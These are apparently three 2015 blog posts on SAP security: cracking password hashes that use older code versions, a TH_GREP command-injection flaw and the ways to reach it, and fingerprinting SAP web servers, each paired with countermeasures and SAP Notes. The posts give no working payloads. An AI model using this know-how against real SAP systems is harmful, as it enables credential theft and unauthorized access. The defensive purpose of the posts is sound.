Monday, August 31, 2015

Understanding SAP password hashing Mechanism and Cracking



What is this Code Version thing?
SAP stores password hashes of all users in table "USR02" and other tables "USH02, USRPWDHISTORY" contain changed password history. ABAP systems do not save passwords in plain text, but instead calculates the hash value and saves them in database, so it cannot be read by anyone having direct access to the database tables. 

Over the time, to improve the security and performance SAP has implemented different password hashing mechanisms which generate password hashes via different algorithms called Code Version "CODVN". Most recent algorithm used is “I”, older versions are:

CODVN Description
--------------------------
A Obsolete
B Based on MD5, 8 characters, Uppercase, ASCII
C Not implemented
D Based on MD5, 8 characters, Uppercase, UTF-8
E Reserved
F Based on SHA1, 40 characters, Case Insensitive, UTF-8
G Code Version B + Code Version F (2 hashes)
H Based on SHA1, rand. salt, 40 characters, Case Insensitive, UTF-8
I Code Version B + Code Version F + Code Version H (3 hashes)

In SAP Table USR02, USH02 the password hashes are stored in different fields based on the CODVN as below:
-----------------------------------------
CODVN B hashes - BCODE field
CODVN F hashes - PASSCODE field
CODVN G stores both the hashes of CODVN-B and F (i.e, BCODE, PASSCODE fields)
CODVN H hashes - PWDSALTEDHASH field
CODVN I similar to CODVN-G and stores the CODVN-H in PWDSALTEDHASH field


How does this cracking work?
As stated above, as of SAP NetWeaver 7.0 system supports new password hashing Mechanism that can generate password consisting of up to 40 characters and are case-sensitive (CODVN: F). It is also possible to use any Unicode characters. But with the older releases of SAP, system generates password consisting up to eight characters and system itself converts them from lowercase to uppercase case letters (CODVN: B,D).

Unfortunately, the above improvements were not backward compatible. which means the passwords stored as hash values in USR02, USH02 are not backward compatible with older releases of SAP or other connected system. 

If you are using an SAP system together with other SAP systems that only support backward compatible password hash values, then there is a need to activate the SAP system profile "login/password_downwards_compatibility". With Downward Compatibility SAP can generate all the possible hash values and uses them wherever required while accessing other SAP systems.

In general we shouldn't be able to retrieve the plain text password from the hash value. But there are some famous password cracking tools like Hash-cat, John the Ripper that are loaded with modules for cracking two of the SAP hash algorithms (CODVN B & F/G). 

Lets say SAP system uses the CODVN-G, which is combination of CODVN-B and CODVN-F. So if we crack the CODVN-B first (MD5,8-characters,Uppercase,ASCII) we get to know 8-characters of the password used within CODNV-G.  In CODVN-B SAP password hashes are salted only with the username. Then using those 8-characters, we can create a password dictionary (using known 8-character as prefix) with all possible characters to crack the remaining character of the password with CODVN-G.


Prevention:
  • Protect access to the hash values in tables like USR02, USH02, USRPWDHISTORY.
  • Use the most recent password hashing algorithm, see parameter login/password_hash_algorithm.
  • Set parameter login/password_downwards_compatibility = 0 (this might break communication with systems older than 7.0, check carefully).
  • Delete old hashes, see ABAP report CLEANUP_PASSWORD_HASH_VALUES.
  • Restrict direct access to the SAP databases via transaction code DBACOCKPIT (SQL prompt) or OS level.
  • Choose strong passwords (enforce them via policies) via the password parameters. 
      login/min_password_lng
      login/min_password_letters
      login/min_password_digits
      login/min_password_lowercase
      login/min_password_uppercase
      login/min_password_specials
      login/password_max_idle_productive
      login/password_max_idle_initial
      login/password_history_size
      login/password_expiration_time     Other Parameters



Reference:
1237762 - ABAP systems: Protection against password hash attacks
1458262 - ABAP: recommended settings for password hash algorithms
862989 - New password rules as of SAP NetWeaver 2004s (NW ABAP 7.0)
http://www.daniel-berlin.de/





Posted by at No comments:

Wednesday, August 26, 2015

SAP NetWeaver code injection via TH_GREP Functional Module



TH_GREP is functional module used by several other SAP programs to search for required string. Function Module TH_GREP contains a vulnerable code that permits the execution of operating system commands remotely, allowing the malicious user to take control of the SAP system by escalating privileges without having a valid credentials.


We can invoke this:
     Vulnerable code via transaction Code "SE37" using function module "TH_GREP"



GREP command utility is used to search a string from within transaction "SM51" screen, which can be misused to trigger the backend vulnerable code as below:



Using remote RFC call "TH_GREP"
Using SOAP RFC call "TH_GREP" via web


  Reference:
http://erpscan.com/

  Prevention:
Restrict access to critical transactions and RFC functions.
        Implement SAP Notes 1580017, 1433101



Posted by at No comments:

Saturday, August 15, 2015

SAP Web Attacks and Countermeasures


This article focus on:

  • Different SAP web Application Servers
  • Fingerprint SAP web applications
  • Countermeasures

Different SAP web Application Servers:

Internet Transaction Server (ITS)
  • SAP introduced ITS (Internet Transaction Server), its initial approach to enable internal access to SAP Servers. ITS acts as a middleware that is capable of translating SAP Dynpros (Dynamic Programs) into HTML Pages. ITS was integrated in WAS 6.40 (Web Application Server).
  • ITS is composed of two major components AGate (application gateway) which links the ITS to the SAP System by receiving Web browser requests from the WGate (Web gateway) via the Web server and communicating with the application server using the DIAG or RFC protocol.

URL syntax to access ITS web service:
http://<server>:<port>/<path_to_wgate>/<service_name>/!?<optional_params>


Internet Communication Manager (ICM)
  • ICM (Internet Communication Manager) ensures that communication between the SAP Web Application Server and the outside world via HTTP, HTTPS and SMTP protocols works properly. 
  • ICM is a component of the SAP NetWeaver Application Server. ICM web requests are handled by ICF (Internet Communication Framework), which provides the service based on arriving URLs, by default ICF services are inactive. ICM Parameters to configure the SAP Server for HTTP, HTTPS, and SMTP.
# Definition of the ports 
icm/server_port_0 = PROT=HTTP, PORT=1080 
icm/server_port_1 = PROT=HTTPS, PORT=1443 
icm/server_port_2 = PROT=SMTP, PORT=1025  

# Parameters for SSL support 
sec/libsapsecu = $(DIR_EXECUTABLE)/libsapcrypto.so 
ssl/ssl_lib = $(DIR_EXECUTABLE)/libsapcrypto.so 

# Parameter for ICM Security Log [Parameters MAXSIZEKB=<max size in KB>, SWITCHTF=<options>, FILEWRAP=on]
icm/security_log = LOGFILE=<file name>, LEVEL=<security level>

# Parameter for ICM logging [Parameters LOGFORMAT=<format>, FILTER=<filter>, MAXSIZEKB=<size in kbytes>, SWITCHTF=<options>, FILEWRAP=on]
icm/HTTP/logging_00 =  PREFIX=<URL prefix>, LOGFILE=<log file name>


SAP Enterprise Portal (EP)

  • Portal provides single point of access to organization’s SAP and non-SAP information sources, enterprise applications, databases and services across organizational via web-based interface.
  • It’s a complex Java application running on J2EE engine, providing role-based access to enterprise information and applications.

Enterprise Portal Ports
HTTP 5xx00
HTTPS 5xx01
Where xx is the Java instance number (JCxx).


Fingerprint SAP web applications

  • It’s common to have the SAP application to be accessed via Internet. Which makes it easier for anonymous users to find and fingerprint SAP Systems. A simply means of finding SAP system connected to Internet is via Search Engine like Google, Shodan, etc. 
  • Once the attacker identifies the SAP systems on the web, attacker can gather version information of the SAP components “ITS, ICM, J2EE Engine (EP)” easily by sending simple HTTP requests to SAP web server, which responds back with sensitive information (send to attacker). 
  • Exploring through Enterprise Portal error messages, we can identify the version of enterprise portal installed as below (In the case Enterprise Portal version: 7.00)
  • Exploring through ICM error messages, we can gather SAP System information like SAP Server Hostname: sapides, System ID: IDS, Instance Number: 00

  • There are more than 1500 standard ICM services within SAP ECC and each service is used to access the application data. In some SAP installations few of those services are active by default, which may lead to sensitive information disclosure as below. 
  • Access to ICM Service “/sap/public/info”, can be used to gather sensitive information like SAP System ID, Hostname, Database Type, SAP Release, Patch level, SAP kernel version, OS type, etc.



In ICM there are two types of services Public and Private. Public services can be executed directly whereas Private services requires initial authentication and later based on the SAP ICF (Internet Communication Framework) authorization objects that were assigned to the user, he/she can execute the required ICM service.




Reference:          

  https://help.sap.com/saphelp_nw73/helpdata/en/48/3d14a6b08c72d1e10000000a42189c/content.htm


Posted by at No comments:
Subscribe to: Posts (Atom)